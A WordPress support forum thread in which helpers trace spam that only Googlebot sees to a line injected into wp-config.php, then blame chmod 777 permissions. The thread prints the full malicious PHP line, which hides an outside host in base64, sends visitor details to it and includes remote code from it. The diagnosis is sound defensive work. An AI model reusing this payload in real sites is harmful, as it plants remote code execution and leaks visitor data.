Support » How-To and Troubleshooting » Google Cache Adding Keywords

Google Cache Adding Keywords

Viewing 5 replies - 1 through 5 (of 5 total)
  • It’s definitely fishy. What plugins do you have installed?

    that looks very sinister. If I had to guess – Its a plugin thats adding content via the wp_head hook.

    Ive emailed you via your contact form, I would really like to go through all your plugins, if you didnt mind.

    Since google’s

    cache is well.. cached.. disabling and enabling plugins isnt neccessarily going to immediately diagnose exactly what plugin is doing that.

    i found your list that says what youre using. There a few dead urls though, the actual files would help immensely

    To follow up on this, for anyone interested:

    I have gone through the zip of plugins off this site, and grepped for every possible javascript escape, urlencode, and the like that might be causing this.

    While I didnt find anything in the plugins, just looking at the source of the front page indicated to me there was some sort of content above <!-- Header Start -->.

    Seeing that, I spoofed my useragent as googlebot, and voila, the added spam content is there for me to see.

    I’ve explained to Chris, the site op, that he needs to take a look at his theme files, specifically header.php for anything that looks unusual. If he doesnt find anything, atleast with the spoofed ua it will be easier to determine if, in fact, it is a plugin.

    alrighty then..

    Chris and I went through his files. He disabled all his plugins. Didnt change. He changed themes. Still there.

    Common sense told me that it had to be somewhere within a core WP file.

    And so it was:

    Within wp-config.php was one line that didnt fit in:

    error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?>

    You can google that string if your especially curious about what it does but here’s a pretty good explanation:


    Chris’ wp-config.php was chmod 777.

    The moral of this story: 777 is evil, repeat after me. 777 is evil. 777 is evil. Your .htaccess doesnt need it. Your wp-config.php doesnt need it. Your theme files dont need it.

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Google Cache Adding Keywords’ is closed to new replies.